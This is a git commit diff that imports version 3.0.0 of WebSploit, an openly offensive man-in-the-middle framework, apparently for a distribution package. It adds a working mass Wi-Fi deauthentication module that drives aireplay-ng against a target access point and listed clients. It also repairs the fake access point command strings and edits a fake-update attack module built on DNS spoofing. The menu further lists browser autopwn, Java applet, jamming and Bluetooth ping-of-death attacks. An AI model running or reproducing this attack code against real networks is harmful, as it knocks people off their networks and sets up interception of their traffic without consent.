Imported Upstream version 3.0.0 upstream upstream/3.0.0
authorSophie Brun <sophie@freexian.com>
Mon, 14 Dec 2015 10:05:55 +0000 (11:05 +0100)
committerSophie Brun <sophie@freexian.com>
Mon, 14 Dec 2015 10:05:55 +0000 (11:05 +0100)
19 files changed:
README.txt
core/about.pyc [new file with mode: 0644]
core/header.pyc [new file with mode: 0644]
core/help.pyc [new file with mode: 0644]
core/menu.py
core/menu.pyc [new file with mode: 0644]
core/modules_database.py
core/modules_database.pyc [new file with mode: 0644]
core/update.py
core/upgrade.py
core/upgrade.pyc [new file with mode: 0644]
core/wcolors.pyc [new file with mode: 0644]
modules/__init__.pyc [deleted file]
modules/fakeupdate/__init__.pyc [deleted file]
modules/fakeupdate/fakeupdate.py
modules/mass_deauth.py [new file with mode: 0644]
modules/wifi_honeypot.py
websploit
wsf-update.py [new file with mode: 0755]

index a90b6c5..f4e97f8 100644 (file)
@@ -29,3 +29,4 @@ Supported Attack :
 #      [+]FakeUpdate - Fake update attack 
 #   [+]Wifi Jammer - Wifi Jammer Attack
 #   [+]Wifi Dos - Wifi Dos RQ Attack
+#   [+]Wifi Mass De-authentication attack
\ No newline at end of file
diff --git a/core/about.pyc b/core/about.pyc
new file mode 100644 (file)
index 0000000..33d42e0
Binary files /dev/null and b/core/about.pyc differ
diff --git a/core/header.pyc b/core/header.pyc
new file mode 100644 (file)
index 0000000..396fb08
Binary files /dev/null and b/core/header.pyc differ
diff --git a/core/help.pyc b/core/help.pyc
new file mode 100644 (file)
index 0000000..31ec0ed
Binary files /dev/null and b/core/help.pyc differ
index f9391d7..41149a8 100644 (file)
@@ -9,9 +9,9 @@ from core import wcolors
 def main_info():
        ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
        print ""
-       print "\t\t--=" + ston + "WebSploit FrameWork"
-       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.5 BETA" + wcolors.color.ENDC
-       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "We're Not Crying Wolf" + wcolors.color.ENDC
-       print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "19" + wcolors.color.ENDC
-       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.5-000 2.3.2014" + wcolors.color.ENDC + "]"
+       print "\t\t--=" + ston + wcolors.color.GREEN + "WebSploit Advanced MITM Framework" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "3.0.0" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "Katana" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "20" + wcolors.color.ENDC
+       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r3.0.0-000 20.9.2014" + wcolors.color.ENDC + "]"
        print "\n\n"
diff --git a/core/menu.pyc b/core/menu.pyc
new file mode 100644 (file)
index 0000000..173ec28
Binary files /dev/null and b/core/menu.pyc differ
index 5e0bac6..9c1b442 100644 (file)
@@ -32,10 +32,11 @@ def modules_database():
     print "exploit/browser_autopwn\t\tMetasploit Browser Autopwn Service"
     print "exploit/java_applet\t\tJava Applet Attack (Using HTML)"
     print "\n"
-    print (wcolors.color.BLUE + "Wireless / Bluetooth Modules\t\tDescription" + wcolors.color.ENDC)
+    print (wcolors.color.BLUE + "Wireless / Bluetooth Modules\tDescription" + wcolors.color.ENDC)
     print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
     print "wifi/wifi_jammer\t\tWifi Jammer"
     print "wifi/wifi_dos\t\t\tWifi Dos Attack"
     print "wifi/wifi_honeypot\t\tWireless Honeypot(Fake AP)"
+    print "wifi/mass_deauth\t\tMass Deauthentication Attack"
     print "bluetooth/bluetooth_pod\t\tBluetooth Ping Of Death Attack"
     print "\n"
diff --git a/core/modules_database.pyc b/core/modules_database.pyc
new file mode 100644 (file)
index 0000000..51ee4d3
Binary files /dev/null and b/core/modules_database.pyc differ
index 4774a3c..b3c9595 100644 (file)
@@ -10,6 +10,5 @@ from core import wcolors
 from time import sleep
 
 def update():
-    print(wcolors.color.RED + "[*]Sorry , This Feature Not Available in This Version ..." + wcolors.color.ENDC)
-    print(wcolors.color.BLUE + "[*]Try With 'upgrade' Command." + wcolors.color.ENDC)
+    print(wcolors.color.BLUE + "[*] Use wsf-update.py script for update, you can find this script in installation folder [/usr/share/websploit]" + wcolors.color.ENDC)
     pass
index 12c5fa7..633e0b7 100644 (file)
@@ -8,19 +8,20 @@ import os
 import urllib
 from time import sleep
 from core import wcolors
+import webbrowser
 
 def upgrade():
     print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Checking For New Version, Please Wait ..." + wcolors.color.ENDC)
     try:
         cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
         res = cu.read()
-        if 'WebSploit Framework V.2.1.0' in res:
+        if 'WebSploit Framework V.3.0.1' in res:
             print(wcolors.color.GREEN + "[*]New Version Available")
             sleep(2)
             print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
             print(wcolors.color.CYAN + "[*]Starting Browser To Download Location, Please Wait ..." + wcolors.color.ENDC)
             sleep(2)
-            os.system('firefox https://sourceforge.net/projects/websploit/files/latest/download?source=files')
+            webbrowser.open("https://sourceforge.net/projects/websploit/files/latest/download?source=files")
         else:
             print(wcolors.color.BOLD + wcolors.color.RED + "[*]New Version Not Available, This Is Latest Version Of The WebSploit Framework." + wcolors.color.ENDC)
             sleep(4)
diff --git a/core/upgrade.pyc b/core/upgrade.pyc
new file mode 100644 (file)
index 0000000..644f68d
Binary files /dev/null and b/core/upgrade.pyc differ
diff --git a/core/wcolors.pyc b/core/wcolors.pyc
new file mode 100644 (file)
index 0000000..e2d2199
Binary files /dev/null and b/core/wcolors.pyc differ
diff --git a/modules/__init__.pyc b/modules/__init__.pyc
deleted file mode 100644 (file)
index bbc82b1..0000000
Binary files a/modules/__init__.pyc and /dev/null differ
diff --git a/modules/fakeupdate/__init__.pyc b/modules/fakeupdate/__init__.pyc
deleted file mode 100644 (file)
index b776aa0..0000000
Binary files a/modules/fakeupdate/__init__.pyc and /dev/null differ
index f99cc1a..8c3423c 100644 (file)
@@ -95,7 +95,7 @@ def fakeupdate():
             sleep(1)
             os.system(macosx_listener)
             print(wcolors.color.GREEN + "[*]Attack Has Been Started." + wcolors.color.ENDC)
-            line_4 = wcolors.color.RED + "[!]When You Get The Session, Press [enter] Key For Kill DNS Spoof Attack ..." + wcolors.color.ENDC
+            line_4 = wcolors.color.RED + "[!]When You Got The Session, Press [enter] Key For Kill DNS Spoof Attack ..." + wcolors.color.ENDC
             enter_key = raw_input(line_4)
             os.system('killall ettercap')
         else:
diff --git a/modules/mass_deauth.py b/modules/mass_deauth.py
new file mode 100644 (file)
index 0000000..84ffbf7
--- /dev/null
@@ -0,0 +1,89 @@
+#!/usr/bin/env python
+#
+# WebSploit Framework Mass De-authentication module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+import os
+import subprocess
+from time import sleep
+from core import help
+from core import wcolors
+
+options = ["wlan0", "00:00:00:00:00:00", "/tmp/essid.txt", "5", "mon0"]
+def mass_deauth():
+       try:
+               line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
+               line_1+= ":"
+               line_1+= wcolors.color.UNDERL + wcolors.color.BLUE + "Mass_Deauth" + wcolors.color.ENDC
+               line_1+= " > "
+               com = raw_input(line_1)
+               com = com.lower()
+               if com[0:13] == 'set interface':
+                       options[0] = com[14:20]
+                       print "INTERFACE => ", options[0]
+                       mass_deauth()
+               elif com[0:9] == 'set bssid':
+                       options[1] = com[10:]
+                       print "BSSID => ", options[1]
+                       mass_deauth()
+               elif com[0:14] == 'set essid_file':
+                       options[2] = com[14:]
+                       print "ESSID_FILE => ", options[2]
+                       mass_deauth()
+               elif com[0:14] == 'set packet_len':
+                       options[3] = com[14:]
+                       print "PACKET_LEN => ", options[3]
+                       mass_deauth()
+               elif com[0:7] == 'set mon':
+                       options[4] = com[8:12]
+                       print "MON => ", options[4]
+                       mass_deauth()
+               elif com[0:2] =='os':
+                       os.system(com[3:])
+                       mass_deauth()
+               elif com[0:4] =='help':
+                       help.help()
+                       mass_deauth()
+               elif com[0:4] =='back':
+                       pass
+               elif com[0:12] =='show options':
+                       print ""
+                       print "Options\t\t Value\t\t\t\t RQ\t Description"
+                       print "---------\t--------------\t\t\t----\t--------------"
+                       print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
+                       print "bssid\t\t"+options[1]+"\t\tyes\tTarget Access Point BSSID"
+                       print "essid_file\t"+options[2]+"\t\t\tyes\tFile Contain Client ESSID"
+                       print "packet_len\t"+options[3]+"\t\t\t\tyes\tNumber of Packets"
+                       print "mon\t\t"+options[4]+"\t\t\t\tyes\tMonitor Mod(default)"
+                       print "\n"
+                       mass_deauth()
+               elif com[0:3] =='run':
+                       print wcolors.color.GREEN + "[*] Loading %s"%options[2] + wcolors.color.ENDC
+                       try:
+                               f = open(options[2], "r").readlines()
+                       except Exception, e:
+                               print wcolors.color.RED + "Error : %s"%e + wcolors.color.ENDC
+                               mass_deauth()
+
+                       print wcolors.color.GREEN + "[*] Enabling Monitor Mod on %s"%options[0]
+                       try:
+                               monitor_mod = "airmon-ng start %s" % (options[0])
+                               subprocess.Popen(monitor_mod, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+                       except Exception, e:
+                               print wcolors.color.RED + "Error : %s"%e + wcolors.color.ENDC
+                               mass_deauth()
+                       for essids in f:
+                               essids = essids.strip("\n")
+                               print wcolors.color.GREEN + "[*] Attempting to De-authentication %s"%essids + wcolors.color.ENDC
+                               command = "aireplay-ng -0 5 -a %s -c %s %s"%(options[1], essids, options[4])
+                               os.system(command)
+                       print wcolors.color.GREEN + "[*] Disabling Monitor Mod ..." + wcolors.color.ENDC
+                       disable_mon = "airmon-ng stop %s"%options[4]
+                       subprocess.Popen(disable_mon, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+                       print wcolors.color.GREEN + "[*] Done."+ wcolors.color.ENDC
+                       mass_deauth()
+               else:
+                       print "Wrong Command => ", com
+                       mass_deauth()
+       except(KeyboardInterrupt):
+               print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
\ No newline at end of file
index 745c67b..6833f6d 100644 (file)
@@ -77,10 +77,10 @@ def wifi_honeypot():
             wifi_honeypot()
         elif com[0:3] == 'run':
             comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
-            comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
-            comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
-            comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
-            monit_mod_start= "airmon-ng start %s" % str(options[1])
+            comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
+            comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
+            comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
+            monit_mod_start= "airmon-ng start %s" % (options[1])
             print(wcolors.color.GREEN+"[*]Enable monitor mod on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
             subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
             print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
index 537b50d..dd31de6 100755 (executable)
--- a/websploit
+++ b/websploit
@@ -20,7 +20,7 @@
 #
 #
 #
-#    WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability
+#    WebSploit Advanced MITM Framework
 #    
 #    
 #    About Author :
@@ -59,6 +59,7 @@ from modules import java_applet
 from modules import wifi_jammer
 from modules import wifi_dos
 from modules import wifi_honeypot
+from modules import mass_deauth
 from modules import bluetooth_pod
 from modules.fakeupdate import fakeupdate
 
@@ -122,6 +123,9 @@ def main():
             elif terminal[4:22] =='wifi/wifi_honeypot':
                 wifi_honeypot.wifi_honeypot()
                 main()
+            elif terminal[4:20] =='wifi/mass_deauth':
+                mass_deauth.mass_deauth()
+                main()
             elif terminal[4:27] =='bluetooth/bluetooth_pod':
                 bluetooth_pod.bluetooth_pod()
                 main()
diff --git a/wsf-update.py b/wsf-update.py
new file mode 100755 (executable)
index 0000000..0ce9202
--- /dev/null
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+#
+# WebSploit FrameWork Update Module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+
+import subprocess
+import os
+from core import wcolors
+
+def update_websploit():
+       print wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC
+       try:
+               subprocess.Popen("cd /tmp;git clone https://github.com/websploit/websploit.git;cp -R websploit/ /usr/share;rm -rf /tmp/websploit/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+       except Exception, e:
+               print wcolors.color.RED + "[!] Update Failed."+ wcolors.color.ENDC
+               pass
+
+       print wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC
+if __name__ == "__main__":
+       update_websploit()
\ No newline at end of file